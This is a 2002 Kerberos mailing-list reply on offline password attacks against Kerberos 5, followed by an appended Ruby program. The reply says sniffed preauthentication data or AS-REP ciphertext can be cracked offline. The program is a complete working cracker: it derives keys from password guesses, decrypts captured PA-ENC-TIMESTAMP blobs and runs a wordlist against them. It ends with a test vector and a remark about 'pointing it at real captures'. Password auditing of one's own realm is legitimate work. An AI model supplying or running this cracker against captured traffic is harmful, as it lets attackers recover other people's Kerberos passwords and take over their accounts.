On Sat, Nov 30, 2002 at 08:24:55PM -0800, Russ Allbery wrote:
> Paul Vixie <[EMAIL PROTECTED]> writes:
>
> > is there a "crack" module for kerberos? after reading the stanford
> > paper about how kerberos tickets could be attacked offline, i've been
> > wanting to actually try this -- no sniffing is required -- against my
> > own kerberos db to look for easy to guess passwords.
>
> Note that the findings of that paper only apply if you use Kerberos v4 or
> don't have preauth turned on. If you're using Kerberos v5 with preauth
> turned on for all users, you cannot launch that style of off-line attack.

If you can sniff the network, you can collect the preauthentication data
and/or the AS-REP and use that ciphertext to launch an off-line attack
quite easily. There is also a third method of collecting such data if you
have a valid principal and password in the target realm, for which you
need not even have the capability of sniffing the network.

> I know that Jack the Ripper has code available to work against an AFS
> kaserver database, but I don't know about Kerberos v5.

It is trivial to write additional code for Jack the Ripper to crack
Kerberos 5 passwords (either from a KDC database or collected as mentioned
above) --- less than two hours work.

> We link cracklib along with additional fascist rules into our kadmind and
> basically try to "pre-crack" passwords whenever anyone changes them.

Good idea.

Cheers,
-- 
Jacques A. Vidrine <[EMAIL PROTECTED]>          http://www.celabo.org/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
[EMAIL PROTECTED] . [EMAIL PROTECTED] . [EMAIL PROTECTED]
________________________________________________
Kerberos mailing list           [EMAIL PROTECTED]
http://mailman.mit.edu/mailman/listinfo/kerberos
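Added example, not taken from the mail above nor from John the Ripper, MIT or Heimdal: the offline check Jacques describes, written out in Ruby on top of Ruby's bundled OpenSSL, against the aes128-cts-hmac-sha1-96 enctype of RFC 3962. That enctype postdates this 2002 thread (a KDC of the day would have issued DES or 3DES keys), but the shape of the attack is the same for every enctype: string-to-key a guess with the victim's salt (realm followed by principal name), derive the key-usage-1 keys, decrypt the captured PA-ENC-TIMESTAMP cipher octets and see whether the integrity tag verifies. Everything concrete here is constructed: the realm EXAMPLE.COM, the principal alice, the password, the wordlist, and the DER PA-ENC-TS-ENC plaintext carrying the time stamp of the mail. The code assumes the EncryptedData cipher octets have already been cut out of the sniffed AS-REQ; it does no ASN.1 parsing of the request itself. The same oracle with key usage 3 applies to the enc-part of a sniffed AS-REP.

```ruby
require "openssl"

# RFC 3961 n-fold: concatenate copies of the input, each rotated right 13 bits more
# than the previous, then ones-complement-add the n-byte slices (end-around carry).
def nfold(data, n)
  data = data.b
  size = data.bytesize * 8
  num = data.unpack1("H*").to_i(16)
  rotr = lambda do |bits| # rotate the whole bit string right by bits
    bits %= size
    v = (num >> bits) | ((num << (size - bits)) & ((1 << size) - 1))
    [v.to_s(16).rjust(data.bytesize * 2, "0")].pack("H*")
  end
  copies = n.lcm(data.bytesize) / data.bytesize
  bytes = (0...copies).map { |i| rotr.call(13 * i) }.join.bytes
  summed = bytes.each_slice(n).reduce { |acc, slice|
    v = acc.zip(slice).map { |a, b| a + b }
    v = (0...n).map { |i| (v[(i + 1) % n] >> 8) + (v[i] & 0xff) } while v.any? { |x| x > 0xff }
    v
  }
  summed.pack("C*")
end

# AES-128-CBC, zero IV, no padding; op is :encrypt or :decrypt. One block of this is ECB.
def cbc(key, data, op)
  c = OpenSSL::Cipher.new("aes-128-cbc")
  c.public_send(op)
  c.key = key
  c.iv = "\x00".b * 16
  c.padding = 0
  c.update(data) + c.final
end

# Kerberos CBC-CTS (RFC 3962 section 3): CBC over the zero-padded plaintext, then the
# last two ciphertext blocks swap and the former penultimate block is cut to r bytes,
# the length of the final partial block. A single block is plain CBC.
def cts_encrypt(key, pt)
  pt = pt.b
  n = (pt.bytesize + 15) / 16
  out = cbc(key, pt.ljust(n * 16, "\x00"), :encrypt)
  return out if n < 2
  out.byteslice(0, (n - 2) * 16) + out.byteslice((n - 1) * 16, 16) +
    out.byteslice((n - 2) * 16, pt.bytesize - (n - 1) * 16)
end

def cts_decrypt(key, ct)
  n = (ct.bytesize + 15) / 16
  return cbc(key, ct, :decrypt) if n < 2
  r = ct.bytesize - (n - 1) * 16
  cn = ct.byteslice((n - 2) * 16, 16)
  # D(C_n) = (P_n || 0) xor C_{n-1}, so its tail restores the truncated part of C_{n-1}
  c_prev = ct.byteslice((n - 1) * 16, r) + cbc(key, cn, :decrypt).byteslice(r, 16 - r)
  full = ct.byteslice(0, (n - 2) * 16) + c_prev + cn
  cbc(key, full, :decrypt).byteslice(0, ct.bytesize)
end

# DK(key, constant) for a 128-bit AES key (RFC 3962 section 4): one block over n-fold(constant).
def dk(key, constant)
  cbc(key, nfold(constant, 16), :encrypt)
end
# aes128-cts-hmac-sha1-96 string_to_key; the salt is realm || principal name.
def string_to_key(password, salt, iterations = 4096)
  tkey = OpenSSL::KDF.pbkdf2_hmac(password, salt: salt, iterations: iterations, length: 16, hash: "sha1")
  dk(tkey, "kerberos")
end
# Ke and Ki for a key usage number (RFC 3961 section 5.3); PA-ENC-TIMESTAMP is usage 1.
def usage_keys(key, usage)
  u = [usage].pack("N")
  [dk(key, u + "\xAA".b), dk(key, u + "\x55".b)]
end
def hmac_sha1_96(ki, data)
  OpenSSL::HMAC.digest("SHA1", ki, data).byteslice(0, 12)
end

# What a client sends as PA-ENC-TIMESTAMP under the RFC 3961 simplified profile:
# CTS(Ke, confounder || plaintext) || HMAC-SHA1-96(Ki, confounder || plaintext).
def encrypt_timestamp(key, plaintext)
  ke, ki = usage_keys(key, 1)
  data = OpenSSL::Random.random_bytes(16) + plaintext.b
  cts_encrypt(ke, data) + hmac_sha1_96(ki, data)
end

# The offline oracle: key the guess, decrypt the captured blob, check the 96-bit HMAC.
def try_password(guess, salt, blob)
  ke, ki = usage_keys(string_to_key(guess, salt), 1)
  ct, tag = blob.byteslice(0, blob.bytesize - 12), blob.byteslice(-12, 12)
  hmac_sha1_96(ki, cts_decrypt(ke, ct)) == tag
end
def crack(wordlist, salt, blob)
  wordlist.find { |w| try_password(w, salt, blob) }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: realm EXAMPLE.COM, principal alice, DER PA-ENC-TS-ENC with
  # patimestamp 20021130202455Z (the time stamp of the mail above).
  salt = "EXAMPLE.COMalice"
  ts = ["3013a011180f"].pack("H*") + "20021130202455Z"
  blob = encrypt_timestamp(string_to_key("s3cret", salt), ts)
  p crack(%w[password alice hunter2 s3cret], salt, blob) # => "s3cret"
end
```

string_to_key("password", "ATHENA.MIT.EDUraeburn", 1) should reproduce the RFC 3962 appendix B key 42263c6e89f4fc28b8df68ee09799f15, which is the quickest way to check the derivation chain before pointing it at real captures. Each guess costs one 4096-round PBKDF2 plus three AES block operations and an HMAC, so a wordlist of a few million entries is minutes of work per principal; the 96-bit tag leaves no practical room for false positives.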
